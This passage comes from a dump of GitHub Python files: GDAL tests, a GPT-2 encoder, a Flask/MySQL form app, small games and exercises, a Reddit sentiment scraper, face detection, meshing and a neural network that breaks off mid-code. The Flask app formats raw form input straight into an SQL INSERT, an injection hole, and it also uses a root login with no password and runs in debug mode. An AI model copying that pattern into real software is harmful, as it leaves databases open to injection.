'success'\n\n###############################################################################\n# Run test_ogrsf -all_drivers\n\ndef ogr_basic_10():\n\n import test_cli_utilities\n if test_cli_utilities.get_test_ogrsf_path() is None:\n return 'skip'\n\n ret = gdaltest.runexternal(test_cli_utilities.get_test_ogrsf_path() + ' -all_drivers')\n\n if ret.find('INFO') == -1 or ret.find('ERROR') != -1:\n print(ret)\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test double call to UseExceptions() (#5704)\n\ndef ogr_basic_11():\n\n if not ogrtest.have_geos():\n return 'skip'\n\n used_exceptions_before = ogr.GetUseExceptions()\n for i in range(2):\n ogr.UseExceptions()\n geom = ogr.CreateGeometryFromWkt('POLYGON ((-65 0, -30 -30, -30 0, -65 -30, -65 0))')\n with gdaltest.error_handler():\n geom.IsValid()\n if used_exceptions_before == 0:\n ogr.DontUseExceptions()\n\n return 'success'\n\n###############################################################################\n# Test OFSTBoolean, OFSTInt16 and OFSTFloat32\n\ndef ogr_basic_12():\n\n # boolean integer\n feat_def = ogr.FeatureDefn()\n if ogr.GetFieldSubTypeName(ogr.OFSTBoolean) != 'Boolean':\n gdaltest.post_reason('fail')\n return 'fail'\n field_def = ogr.FieldDefn( 'fld', ogr.OFTInteger )\n field_def.SetSubType( ogr.OFSTBoolean )\n if field_def.GetSubType() != ogr.OFSTBoolean:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n f = ogr.Feature(feat_def)\n f.SetField('fld', 0)\n f.SetField('fld', 1)\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', 2)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != 1:\n gdaltest.post_reason('fail')\n return 'fail'\n\n f.SetField('fld', '0')\n f.SetField('fld', '1')\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', '2')\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != 1:\n gdaltest.post_reason('fail')\n return 'fail'\n\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n field_def = ogr.FieldDefn( 'fld', ogr.OFTString )\n field_def.SetSubType( ogr.OFSTBoolean )\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if field_def.GetSubType() != ogr.OFSTNone:\n gdaltest.post_reason('fail')\n return 'fail'\n\n # boolean list\n feat_def = ogr.FeatureDefn()\n field_def = ogr.FieldDefn( 'fld', ogr.OFTIntegerList )\n field_def.SetSubType( ogr.OFSTBoolean )\n if field_def.GetSubType() != ogr.OFSTBoolean:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n f = ogr.Feature(feat_def)\n f.SetFieldIntegerList(0, [0,1])\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetFieldIntegerList(0, [0,1,2,1])\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != [0,1,1,1]:\n print(f.GetField('fld'))\n gdaltest.post_reason('fail')\n return 'fail'\n\n # int16 integer\n feat_def = ogr.FeatureDefn()\n if ogr.GetFieldSubTypeName(ogr.OFSTInt16) != 'Int16':\n gdaltest.post_reason('fail')\n return 'fail'\n field_def = ogr.FieldDefn( 'fld', ogr.OFTInteger )\n field_def.SetSubType( ogr.OFSTInt16 )\n if field_def.GetSubType() != ogr.OFSTInt16:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n f = ogr.Feature(feat_def)\n f.SetField('fld', -32768)\n f.SetField('fld', 32767)\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', -32769)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != -32768:\n gdaltest.post_reason('fail')\n return 'fail'\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', 32768)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if f.GetField('fld') != 32767:\n gdaltest.post_reason('fail')\n return 'fail'\n\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n field_def = ogr.FieldDefn( 'fld', ogr.OFTString )\n field_def.SetSubType( ogr.OFSTInt16 )\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if field_def.GetSubType() != ogr.OFSTNone:\n gdaltest.post_reason('fail')\n return 'fail'\n\n # float32\n feat_def = ogr.FeatureDefn()\n if ogr.GetFieldSubTypeName(ogr.OFSTFloat32) != 'Float32':\n gdaltest.post_reason('fail')\n return 'fail'\n field_def = ogr.FieldDefn( 'fld', ogr.OFTReal )\n field_def.SetSubType( ogr.OFSTFloat32 )\n if field_def.GetSubType() != ogr.OFSTFloat32:\n gdaltest.post_reason('fail')\n return 'fail'\n feat_def.AddFieldDefn( field_def )\n\n if False:\n f = ogr.Feature(feat_def)\n gdal.ErrorReset()\n f.SetField('fld', '1.23')\n if gdal.GetLastErrorMsg() != '':\n gdaltest.post_reason('fail')\n return 'fail'\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n f.SetField('fld', 1.230000000001)\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if abs(f.GetField('fld') - 1.23) < 1e-8:\n gdaltest.post_reason('fail')\n f.DumpReadable()\n return 'fail'\n\n gdal.ErrorReset()\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n field_def = ogr.FieldDefn( 'fld', ogr.OFSTFloat32 )\n field_def.SetSubType( ogr.OFSTInt16 )\n gdal.PopErrorHandler()\n if gdal.GetLastErrorMsg() == '':\n gdaltest.post_reason('fail')\n return 'fail'\n if field_def.GetSubType() != ogr.OFSTNone:\n gdaltest.post_reason('fail')\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test OGRParseDate (#6452)\n\ndef ogr_basic_13():\n feat_defn = ogr.FeatureDefn('test')\n field_defn = ogr.FieldDefn('date', ogr.OFTDateTime)\n feat_defn.AddFieldDefn(field_defn)\n\n tests = [ ('2016/1/1', '2016/01/01 00:00:00'),\n ('2016/1/1 12:34', '2016/01/01 12:34:00'),\n ('2016/1/1 12:34:56', '2016/01/01 12:34:56'),\n ('2016/1/1 12:34:56.789', '2016/01/01 12:34:56.789'),\n ('2016/12/31', '2016/12/31 00:00:00'),\n ('-2016/12/31', '-2016/12/31 00:00:00'),\n ('2016-12-31', '2016/12/31 00:00:00'),\n ('0080/1/1', '0080/01/01 00:00:00'),\n ('80/1/1', '1980/01/01 00:00:00'),\n ('0010/1/1', '0010/01/01 00:00:00'),\n ('9/1/1', '2009/01/01 00:00:00'),\n ('10/1/1', '2010/01/01 00:00:00'),\n ('2016-13-31', None),\n ('2016-0-31', None),\n ('2016-1-32', None),\n ('2016-1-0', None),\n ('0/1/1','2000/01/01 00:00:00'),\n ('00/1/1', '2000/01/01 00:00:00'),\n ('00/00/00', None),\n ('000/00/00', None),\n ('0000/00/00', None),\n ('//foo', None) ]\n\n for (val, expected_ret) in tests:\n f = ogr.Feature(feat_defn)\n f.SetField('date', val)\n if f.GetField('date') != expected_ret:\n gdaltest.post_reason('fail')\n print(val)\n print(f.GetField('date'))\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test ogr.Open(.) in an empty directory\n\ndef ogr_basic_14():\n \n os.mkdir('tmp/ogr_basic_14')\n os.chdir('tmp/ogr_basic_14')\n ds = ogr.Open('.')\n os.chdir('../..')\n\n if ds is not None:\n return 'fail'\n\n os.rmdir('tmp/ogr_basic_14')\n\n return 'success'\n\n###############################################################################\n# cleanup\n\ndef ogr_basic_cleanup():\n gdaltest.lyr = None\n gdaltest.ds = None\n\n return 'success'\n\ngdaltest_list = [\n ogr_basic_1,\n ogr_basic_2,\n ogr_basic_3,\n ogr_basic_4,\n ogr_basic_5,\n ogr_basic_6,\n ogr_basic_7,\n ogr_basic_8,\n ogr_basic_9,\n ogr_basic_10,\n ogr_basic_11,\n ogr_basic_12,\n ogr_basic_13,\n ogr_basic_14,\n ogr_basic_cleanup ]\n\n#gdaltest_list = [ ogr_basic_13 ]\n\nif __name__ == '__main__':\n\n gdaltest.setup_run( 'ogr_basic_test' )\n\n gdaltest.run_tests( gdaltest_list )\n\n gdaltest.summarize()\n","repo_name":"ryandavid/rotobox","sub_path":"3rd_party/gdal/autotest/ogr/ogr_basic_test.py","file_name":"ogr_basic_test.py","file_ext":"py","file_size_in_byte":21658,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"12206875032","text":"from pytorch_transformers import GPT2Config, GPT2Model\nfrom onmt.modules.embeddings import Embeddings\nfrom onmt.encoders.transformer import EncoderBase\nimport os\nfrom programmingalpha.models import expandEmbeddingByN\n\nclass OnmtGPT2Encoder(EncoderBase):\n def __init__(self, model_path):\n super(OnmtGPT2Encoder, self).__init__()\n config=GPT2Config.from_json_file(os.path.join( model_path, \"config.json\") )\n pretrained_dict=os.path.join( model_path, \"pytorch_model.bin\")\n if os.path.exists(pretrained_dict):\n model=GPT2Model.from_pretrained(pretrained_model_name_or_path=pretrained_dict, config=config)\n print(\"init GPT2 model with {} weights\".format(len(model.state_dict())))\n else:\n model=GPT2Model(config)\n\n model.wte=expandEmbeddingByN(model.wte, 4)\n self.encoder=model\n\n #print(model)\n print(\"***\"*20)\n\n \n def forward(self, src, lengths=None):\n \"\"\"\n Args:\n src (LongTensor):\n padded sequences of sparse indices ``(src_len, batch, nfeat)``\n lengths (LongTensor): length of each sequence ``(batch,)``\n\n \"\"\"\n inputids=src.squeeze(2).transpose(0,1).contiguous()\n\n outputs=self.encoder(input_ids=inputids)\n #print(len(outputs))\n #print(outputs)\n\n emb=outputs[2][-1]\n memory_bank=outputs[0]\n\n emb=emb.transpose(0,1).contiguous()\n memory_bank=memory_bank.transpose(0,1).contiguous()\n\n #print(\"src--> outs\", src.size(), emb.size(), memory_bank.size())\n\n return emb, memory_bank, lengths \n\ndef getWordEmbeddingFromGPT2Encoder(model:OnmtGPT2Encoder):\n return model.encoder.wte\n\ndef buildGPT2(**kwargs):\n if \"model_path\" not in kwargs:\n import programmingalpha\n kwargs[\"model_path\"] = programmingalpha.GPT2Base\n\n encoder=OnmtGPT2Encoder(kwargs[\"model_path\"])\n\n return encoder","repo_name":"zhangzhenyu13/ProgrammingAlpha","sub_path":"programmingalpha/models/GenerationNets/GPT2Gen.py","file_name":"GPT2Gen.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"12050526895","text":"from flask import Flask, render_template, request\nfrom flask_mysqldb import MySQL\napp = Flask(__name__)\n\n\napp.config['MYSQL_HOST'] = '10.80.7.129'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'satdata'\n\nmysql = MySQL(app)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == \"POST\":\n details = request.form\n log_time = details['log']\n _ID = details['id']\n orbit = details['or']\n sendfrom = details['send']\n location = details['loc']\n \n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO messages(log_time, ID, orbit, sendfrom, location) VALUES ('%s','%s','%s','%s','%s')\" %(log_time,_ID,orbit,sendfrom,location))\n mysql.connection.commit()\n cur.close()\n return 'successfully incert'\n return render_template('web1.html')\n\n\nif __name__ == '__main__':\n app.run(\"0.0.0.0\", port=5000, debug=True)\n","repo_name":"dinuka555/test_3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15462280745","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nplayer = Player()\nscoreboard = Scoreboard()\ncars = CarManager()\n\nfor i in range(100):\n cars.decide_cars()\n cars.move_cars()\n\nscreen.listen()\nscreen.onkey(player.move, 'Up')\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n cars.decide_cars()\n cars.move_cars()\n if player.ycor() > player.get_finish():\n player.reset_pos()\n scoreboard.inc_score()\n cars.inc_speed()\n if not cars.is_clear(player.ycor(), True):\n game_is_on = False\n scoreboard.game_over()\n\nscreen.exitonclick()\n","repo_name":"jgregory39/100DoC-Python","sub_path":"Day-23-Turtle-Crossing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11144720463","text":"def pali(n):\n s=n\n m=0\n while s:\n re=s%10\n m=m*10+re\n s=s//10\n return n==m\n \nn=int(input())\nc=0\nlst=list(map(int,input().split()))\nfor i in lst:\n if pali(i):\n c+=1\nprint(c)","repo_name":"RenukaPulavarthi/codemind-python","sub_path":"Count_palindromes.py","file_name":"Count_palindromes.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6666997616","text":"import praw, os\nfrom dotenv import load_dotenv\nfrom .produce import produce_k\nfrom .analysis import analysis_s\nfrom .map import submission_to_dict, comment_to_dict, reddit_to_json\n\ndef display_author(comment):\n if comment.author:\n return comment.body\n\nclass gather(produce_k, analysis_s):\n def __init__(self, args): \n load_dotenv()\n produce_k.__init__(self, int(os.getenv(\"FLUSH_LIMIT\")),\n os.getenv(\"BOOTSTRAP_SERVER\"))\n analysis_s.__init__(self, 'en')\n self.keyword = args.k\n self.limit = args.l\n self.reddit = praw.Reddit(client_id=os.getenv(\"C_ID\"),\n client_secret=os.getenv(\"C_SECRET\"),\n user_agent=os.getenv(\"U_AGENT\"),\n username=os.getenv(\"USERNAME\"),\n password=os.getenv(\"PASSWORD\"))\n\n def post_metadata(self, post):\n \n obj = {}\n\n obj[\"post_score\"] = self.analyze(post.title)\n submission_to_dict(obj, post)\n\n post.comments.replace_more(limit=10)\n for comment in post.comments.list():\n if comment.body:\n obj[\"comment_score\"] = self.analyze(comment.body)\n\n comment_to_dict(obj, comment)\n self.send('reddit', reddit_to_json(obj))\n \n def get_posts(self, search):\n return self.reddit.subreddit(\"all\").search(search, limit=self.limit)\n\n def launch(self):\n submission = self.get_posts(self.keyword)\n for p in submission:\n self.post_metadata(p)\n","repo_name":"Surphix/RedditGather","sub_path":"gather/gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34640506677","text":"from argparse import Namespace\n\nargs = Namespace(\n# root directory of the datasets\n mnistroot = \"./data/mnist\",\n cifarroot = \"./data/cifar\",\n svhnroot = \"./data/svhn\",\n\n # learning rate\n lr = 1.0,\n\n # batch size\n batch_size = 8,\n\n # epochs for image classification\n epoch_image_classification = 500,\n\n # epochs for masked language modeling\n epoch_language_modeling = 100,\n\n # manual seed\n manual_seed = 100\n)","repo_name":"FaisalAhmed0/Deep-Leakage-from-Gradients","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1120462295","text":"#################################\n# Nicolas LAUBE\n# Sylvain MACE\n# Melvin BICHO\n# package utilitaire pour le projet\n#####################################\nimport cv2 as cv\n\n\ndef reco_webcam():\n face_cascade = cv.CascadeClassifier('Data/haarcascade_frontalface_default.xml')\n eye_cascade = cv.CascadeClassifier('Data/haarcascade_eye.xml')\n\n #Webcam capture\n video_capture = cv.VideoCapture(0)\n while True:\n ret, frame = video_capture.read()\n frame = cv.flip(frame, 1)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n cv.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex, ey, ew, eh) in eyes:\n cv.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n cv.imshow('img', frame)\n if cv.waitKey(1) == 27:\n break # esc to quit\n cv.destroyAllWindows()\n\n\ndef face_delimitation(facepath):\n face_cascade = cv.CascadeClassifier('haarcascade_frontalface_default.xml')\n eye_cascade = cv.CascadeClassifier('haarcascade_eye.xml')\n img = cv.imread(facepath)\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex,ey,ew,eh) in eyes:\n cv.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n cv.imshow('img',img)\n cv.waitKey(0)\n cv.destroyAllWindows()\n","repo_name":"NicolasLaube/G10_Raspberry_Pi_SNM","sub_path":"facerecognition/haar_cascade_detection.py","file_name":"haar_cascade_detection.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34735875203","text":"from TwoDimensionalUtils.data import *\nimport numpy as np\n# from display import displayMesh\n\n'''\n Author: Wang Jingzhou\n Email: Andrewwang@whu.edu.cn\n Affiliation: School of water resources and hydropower engineering, Wuhan University\n'''\n\ndef triMesh(domain):\n points = np.array([domain.point[point_name].coord\n for point_name in domain.point_name])\n # get a rectangle cover the points\n coord_max = np.max(points, axis=0)\n coord_min = np.min(points, axis=0)\n\n # enlarge the rectangle\n ratio = 3\n length = coord_max - coord_min\n coord_max = coord_max + ratio * length\n coord_min = coord_min - ratio * length\n length = ( 1 + 2 * ratio) * length\n\n # create a super triangle according to the rectangle\n\n new_name = max(domain.point_name) + 1\n points = [Point(new_name, coord_min)]\n for i in range(len(coord_max)):\n new_name += 1\n offset = np.zeros_like(coord_min)\n offset[i] = len(coord_min) * length[i]\n points.append(Point(new_name, coord_min + offset))\n init_triangles = [Triangle(0, points)]\n\n # initialize the mesh\n mesh = TriMesh(init_triangles)\n\n # add the points at the boundary of the domain\n for point_name in domain.point_name:\n mesh.addPoint(domain.point[point_name])\n\n # delete the points which in the super triangle\n point_init = {init_triangle.point[point_name]\n for init_triangle in init_triangles\n for point_name in init_triangle.point_name}\n for point in list(point_init):\n mesh.delPoint(point)\n\n # delete the element out of the domain\n triangle_del = []\n for triangle_name in mesh.triangle_name:\n triangle = mesh.triangle[triangle_name]\n center_coord = triangle.center\n point = Point(0, center_coord)\n if not(domain.insideJudge(point)):\n triangle_del.append(triangle_name)\n for triangle_name in triangle_del:\n mesh.delTriangle(mesh.triangle[triangle_name])\n\n # optimize the mesh\n mesh.initMeshParam(domain)\n mesh_R = sorted(zip(mesh.R.values(),mesh.R.keys()))\n while mesh_R[-1][0] > 1:\n mesh.updateMeshParam(mesh_R[-1][1])\n mesh_R = sorted(zip(mesh.R.values(), mesh.R.keys()))\n\n return mesh\n\n# TODO define a function to judge the order of the points\ndef pointsOrder(points):\n pass\n\ndef reflect(points, i, j, m, n):\n xi = 2 / m * i - 1\n eta = 2 / n * j - 1\n N1 = (1 - xi) * (1 - eta) / 4\n N2 = (1 + xi) * (1 - eta) / 4\n N3 = (1 + xi) * (1 + eta) / 4\n N4 = (1 - xi) * (1 + eta) / 4\n N = np.array([N1, N2, N3, N4])\n coord = np.dot(N, points)\n return coord.tolist()\n\ndef QuadMesh(ori_points, m, n):\n points = np.array(ori_points)\n pointsOrder(points)\n node = []\n elem = []\n node_row = []\n for i in range(m + 1):\n node_row.append(reflect(points, i, 0, m, n))\n node.append(node_row)\n\n for j in range(1, n + 1):\n node_row = []\n node_row.append(reflect(points, 0, j, m, n))\n for i in range(1, m + 1):\n node_row.append(reflect(points, i, j, m, n))\n elem.append([[j - 1, i - 1],\n [j - 1, i],\n [j, i],\n [j, i - 1]])\n node.append(node_row)\n\n return np.array(node), np.array(elem)","repo_name":"guanshaoheng/pyfem","sub_path":"utils/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26742427217","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 3 20:12:50 2014\n\n@author: zah\n\"\"\"\nimport inspect\nfrom collections import defaultdict\n\nfrom IPython.utils import traitlets\nfrom IPython.html import widgets\n\ndef add_to_list(l, elem):\n \"\"\"Add an element to a list changing the id and refreshing it\"\"\"\n l = l + [elem]\n\ndef remove_from_list(l, elem):\n \"\"\"Delete an element from a list changing the id and refreshing it\"\"\"\n l.remove(elem)\n l = list(l)\n\ndef add_child(container, child):\n container.children = container.children + (child,)\n\n\nclass EvaluableWidget(widgets.TextWidget):\n\n def __setattribute__(self, attr, value):\n\n super(EvaluableWidget, self).__setattribute__(attr, value)\n if attr == 'value':\n self.context = inspect.stack[1][0].f_locals\n\n def __getattribute__(self, attr):\n\n value = super(EvaluableWidget, self).__getattribute__(attr)\n if attr == 'value':\n value = eval(value, globals(), self.context)\n\n\n\nwidget_mapping = defaultdict(lambda: widgets.TextWidget, {\n 'String': widgets.TextWidget,\n 'Boolean': widgets.CheckboxWidget,\n 'Integer': widgets.IntTextWidget,\n 'Double': widgets.FloatTextWidget,\n 'Object': EvaluableWidget,\n\n})\n\nparam_types = widget_mapping.keys()","repo_name":"Zaharid/labcore","sub_path":"labcore/iobjects/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29422148779","text":"# completa el código de la función\ndef amigos(a, b):\n def sumaDivisores(num):\n suma = 0\n for i in range(1, num):\n if num % i == 0:\n suma += i\n return suma\n suma_a = sumaDivisores(a)\n suma_b = sumaDivisores(b)\n return suma_a == b and suma_b == a\n# Valores de ejemplo para probar la función\nn1 = 220\nn2 = 284\nresultado = amigos(n1, n2)\nprint(resultado)","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej2/tema2_ej2_dc21469a6cb8f3f7b42f4f0a4fc3803d.py","file_name":"tema2_ej2_dc21469a6cb8f3f7b42f4f0a4fc3803d.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31226353299","text":"import numpy as np\nimport math\nfrom sklearn.model_selection import train_test_split\n\nfilename = 'data.txt'\nwrite_file = 'output.txt'\nweights_1 = np.array([[0.1, 0.4],\n [0.3, 0.3],\n [0.4, 0.2]])\nweights_2 = np.array([[0.1, 0.3], \n [0.3, 0.1]])\n\nbias = np.array([[1.0],\n [1.0]])\n\nbias_weights = np.array([[0.8, 0.8],\n [1.0, 1.0]])\n\nlearning_rate = .5\n\ndef read_data():\n try:\n with open(filename) as f_obj:\n lines = f_obj.readlines()\n return lines\n\n except FileNotFoundError:\n print(\"File Not Found\")\n return None\n\ndef split_data(lines):\n \"\"\"Split data into train and test sets.\"\"\"\n \n num_examples = len(lines)\n input_array = np.zeros((num_examples, 3))\n output_array = np.zeros((num_examples, 2))\n\n index = 0\n for line in lines:\n in1, in2, in3, out = line.split(\" \")\n\n # minimum = min(float(in1), float(in2), float(in3))\n # maximum = max(float(in1), float(in2), float(in3))\n\n # range1 = maximum - minimum\n # in1 = (float(in1) - minimum) / range1\n # in2 = (float(in2) - minimum) / range1\n # in3 = (float(in3) - minimum) / range1\n\n # range2 = 1 - (-1)\n # in1 = (in1 * range2) + (-1)\n # in2 = (in2 * range2) + (-1)\n # in3 = (in3 * range2) + (-1)\n\n input_array[index][0] = float(in1)\n input_array[index][1] = float(in2)\n input_array[index][2] = float(in3)\n if float(out) == 1:\n output_array[index][0] = float(out)\n output_array[index][1] = float(0)\n else:\n output_array[index][0] = float(0)\n output_array[index][1] = float(1)\n\n index = index + 1\n\n i_train, i_test, o_train, o_test = train_test_split(input_array, output_array, train_size=.80, test_size=.20)\n return i_train, i_test, o_train, o_test\n\ndef activation(node_net_input):\n \"\"\"Apply the sigmoid activation function to the net input of a node.\"\"\"\n # Activation function is the sigmoid function\n\n node_output = 1 / (1 + math.exp(-1 * node_net_input))\n\n return node_output\n\ndef forward_pass(inputs):\n \"\"\"Perform the forward pass of the neural network\"\"\"\n\n # first layer\n in1 = inputs.dot(weights_1)\n net_input1 = in1\n for i in range(in1.size):\n net_input1[i] = in1[i] + (bias[0] * bias_weights[0][i])\n # net_input1 = in1 + (bias[0] * bias_weights[0])\n net_output1 = net_input1\n \n for i in range(in1.size):\n net_output1[i] = activation(net_input1[i])\n\n # second layer\n # in2 = weights_2.dot(net_output1)\n in2 = net_output1.dot(weights_2)\n net_input2 = in2\n for i in range(in2.size):\n net_input2[i] = in2[i] + (bias[1] * bias_weights[1][i])\n # net_input2 = in2 + (bias[1] * bias_weights[1])\n net_output2 = net_input2\n for i in range(in2.size):\n net_output2[i] = activation(net_input2[i])\n\n return net_output1, net_output2\n\ndef calculate_loss(outputs, targets):\n \"\"\"Calculate the loss for the results of the forward pass.\"\"\"\n # Loss function: L = (o1 - o1')^2 + (o2 - o2')^2\n\n l1 = (targets[0] - outputs[0]) * (targets[0] - outputs[0])\n l2 = (targets[1] - outputs[1]) * (targets[1] - outputs[1])\n\n loss = l1 + l2\n\n return loss\n\ndef calculate_output_layer_gradient(network_output, target_output, node_output):\n \"\"\"Calculate the gradient of an output layer weight.\"\"\"\n deltaz = calculate_deltaz(network_output, target_output)\n gradient = deltaz * node_output\n\n return gradient\n\ndef calculate_hidden_layer_gradient(network_outputs, target_outputs, weight_1, weight_2, node_output, network_input):\n part_deriv_loss_out1 = calculate_deltaz(network_outputs[0], target_outputs[0]) * weight_1\n part_deriv_loss_out2 = calculate_deltaz(network_outputs[1], target_outputs[1]) * weight_2\n part_deriv_out_net = node_output * (1 - node_output)\n part_deriv_net_weight = network_input\n\n gradient = (part_deriv_loss_out1 + part_deriv_loss_out2) * part_deriv_out_net * part_deriv_net_weight\n return gradient\n\ndef calculate_hidden_layer_bias_gradient(network_outputs, target_outputs, weight_1, weight_2, node_output):\n part_deriv_loss_out1 = calculate_deltaz(network_outputs[0], target_outputs[0]) * weight_1\n part_deriv_loss_out2 = calculate_deltaz(network_outputs[1], target_outputs[1]) * weight_2\n part_deriv_out_net = node_output * (1 - node_output)\n\n gradient = (part_deriv_loss_out1 + part_deriv_loss_out2) * part_deriv_out_net\n return gradient\n\n\ndef calculate_deltaz(network_output, target_output):\n part_deriv_loss = 2 * (network_output - target_output)\n part_deriv_output = network_output * (1 - network_output)\n deltaz = part_deriv_loss * part_deriv_output\n\n return deltaz\n\ndef calculate_gradients(network_inputs, network_outputs, targets, layer1_node_outputs):\n \"\"\"Calculate the gradients of all of the weights.\"\"\"\n output_layer_gradient_array = np.zeros((2, 2))\n hidden_layer_gradient_array = np.zeros((3, 2))\n output_layer_bias_gradients = np.zeros((1, 2))\n hidden_layer_bias_gradients = np.zeros((1, 2))\n\n # compute output layer gradients\n for i in range(np.size(output_layer_gradient_array, 1)):\n for j in range(np.size(output_layer_gradient_array, 0)):\n gradient = calculate_output_layer_gradient(network_outputs[i], targets[i], layer1_node_outputs[j])\n output_layer_gradient_array[j][i] = gradient\n output_layer_bias_gradients[0][i] = calculate_deltaz(network_outputs[i], targets[i])\n \n # compute hidden layer gradients\n for i in range(np.size(hidden_layer_gradient_array, 1)):\n for j in range(np.size(hidden_layer_gradient_array, 0)):\n gradient = calculate_hidden_layer_gradient(network_outputs, targets, weights_2[i][0], weights_2[i][1], layer1_node_outputs[i], network_inputs[j])\n hidden_layer_gradient_array[j][i] = gradient\n hidden_layer_bias_gradients[0][i] = calculate_hidden_layer_bias_gradient(network_outputs, targets, weights_2[i][0], weights_2[i][1], layer1_node_outputs[i])\n\n return output_layer_gradient_array, hidden_layer_gradient_array, output_layer_bias_gradients, hidden_layer_bias_gradients\n\n\ndef update_weights(weights, gradients):\n \"\"\"Update the weights\"\"\"\n # Updating by using Stochastic Gradient Descent\n\n for i in range(np.size(weights, 0)):\n for j in range(np.size(weights, 1)):\n weights[i][j] = weights[i][j] - learning_rate * gradients[i][j]\n\n return weights\n\ndef update_bias_weights(weights, gradients):\n \"\"\"Update the bias weights\"\"\"\n # Updating by using Stochastic Gradient Descent\n\n for i in range(weights.size):\n weights[i] = weights[i] - (learning_rate * gradients[i])\n\n return weights\n\ndef back_prop(network_inputs, network_outputs, targets, layer1_node_outputs):\n \"\"\"Perform back propogation of the neural network.\"\"\"\n global weights_1, weights_2, bias_weights\n output_layer_gradient_array = np.zeros((2, 2))\n hidden_layer_gradient_array = np.zeros((3, 2))\n output_layer_bias_gradient_array = np.zeros((1, 